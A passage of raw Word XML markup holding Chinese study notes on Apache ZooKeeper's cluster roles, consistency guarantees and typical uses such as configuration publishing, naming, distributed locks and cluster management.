          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>服务自身组成一个集群</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(2n+1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>个服务允许</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>个失效</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Zookeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>服务有两个角色，一个是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，负责写服务和数据同步，剩下的是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>follower</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，提供读服务，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>失效后会在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>follower</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>中重新选举新的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Zookeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>逻辑图如下，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="330" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="3E62A6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5742305" cy="1791970"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="图片 4" descr="http://static.oschina.net/uploads/img/201212/25151024_hgTU.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId29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tatic.oschina.net/uploads/img/201212/25151024_hgTU.jpg">
                      <a:hlinkClick r:id="rId291" tgtFrame="&quot;_blank&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId292" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5742305" cy="1791970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>客户端可以连接到每个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，每个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的数据完全相同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>每个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>follower</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>都和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>有连接，接受</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的数据更新操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(3)Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>记录事务日志和快照到持久存储。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(4)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>大多数</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>可用，整体服务就可用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00E823E7" w:rsidP="00C82798">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="001358F7" w:rsidRPr="00F41A4C">
        <w:t>.3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.2</w:t>
      </w:r>
      <w:r w:rsidR="00746C49" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00746C49" w:rsidRPr="00F41A4C">
        <w:t>特点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>表现为一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>分层</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的文件系统目录树结构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>顺序一致性：按照客户端发送请求的顺序更新数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>原子性：更新要么成功，要么失败，不会出现部分更新。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>单一性：无论客户端连接哪个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，都会看到同一个视图。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>可靠性：一旦数据更新成功，将一直保持，直到新的更新。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>及时性：客户端会在一个确定的时间内得到最新的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00FF3F7D" w:rsidP="00C82798">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00641987" w:rsidRPr="00F41A4C">
        <w:t>.3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.3</w:t>
      </w:r>
      <w:r w:rsidR="00746C49" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00746C49" w:rsidRPr="00F41A4C">
        <w:t>应用场景</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>数据发布与订阅（我的业务用到这个特性，后面会有详细介绍）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>应用配置集中到节点上，应用启动时主动获取，并在节点上注册一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>watcher</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，每次配置更新都会通知到应用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>名空间服务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>分布式命名服务，创建一个节点后，节点的路径就是全局唯一的，可以作为全局名称使用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>分布式通知</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>协调</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>不同的系统都监听同一个节点，一旦有了更新，另一个系统能够收到通知。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>分布式锁</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Zookeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>能保证数据的强一致性，用户任何时候都可以相信集群中每个节点的数据都是相同的。一个用户创建一个节点作为锁，另一个用户检测该节点，如果存在，代表别的用户已经锁住，如果不存在，则可以创建一个节点，代表拥有一个锁。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>集群管理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>每个加入集群的机器都创建一个节点，写入自己的状态。监控父节点的用户会受到通知，进行相应的处理。离开时删除节点，监控父节点的用户同样会收到通知。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>http://www.oschina.net/question/928033_84720</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746C49" w:rsidRPr="00F41A4C" w:rsidRDefault="00746C49" w:rsidP="00746C49">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA488D" w:rsidRPr="00151BA9" w:rsidRDefault="00746C49" w:rsidP="000979F3">
      <w:pPr>
